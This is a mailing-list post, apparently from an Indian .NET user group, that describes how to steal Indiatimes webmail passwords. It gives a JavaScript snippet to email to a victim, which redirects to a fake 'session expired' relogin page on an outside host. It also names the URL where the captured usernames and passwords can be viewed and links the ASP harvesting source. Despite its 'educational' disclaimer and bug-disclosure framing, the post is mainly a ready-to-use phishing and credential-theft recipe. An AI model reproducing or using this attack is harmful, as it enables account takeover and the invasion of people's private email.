-----------------------------------------------------------
New Message on BDOTNET
-----------------------------------------------------------
From: sharath_av
Message 1 in Discussion

Hi,

All you have to do to get an Indiatimes user's password is send the below JavaScript to the user as an email.

    <script language="JavaScript">
    document.location= "http://bb.1asphost.com/indiatimes/Indiatimes.htm"
    </script>

When the user has checked this mail, you can see that user's Username and Password at the following URL:
http://bb.1asphost.com/indiatimes/display.asp

How this works:

There is a bug in the Indiatimes email service that most of the users are not aware of. The bug is that the Indiatimes email service supports JavaScript in email. This means that if we write code in JavaScript and send it as a mail to any Indiatimes user, the script runs as soon as the user opens his email. The user cannot even read the JavaScript.

What my JavaScript code does is just redirect the webpage to a modified version of the "Relogin Page" of Indiatimes. When the user opens the email with this JavaScript, the script runs and the user gets a web page saying "Your login session is expired, Please Relogin".

Now when the user enters his Username & Password in this page and submits, it actually runs an ASP script and logs the Username and Password in an MS-Access database. The user gets a message saying "Indiatimes server is down, Please try again later", which is a dummy message.

So when the user has checked his/her mail, you can see his/her password at the following URL:
http://bb.1asphost.com/indiatimes/display.asp

You can download the ASP source for this from:
http://www.geocities.com/avsharath/indiatimes.zip

I'm sending this message for educational purposes and to make you people aware of this bug in the Indiatimes email service.

Warning: DO NOT USE THIS WITH BAD INTENTIONS TO INVADE OTHERS' PERSONAL MAILS.

I had informed Indiatimes about this bug long back but they haven't taken any action yet to remove the bug. So do spread this message to your friends.

Sharath A.V (BMSIT)
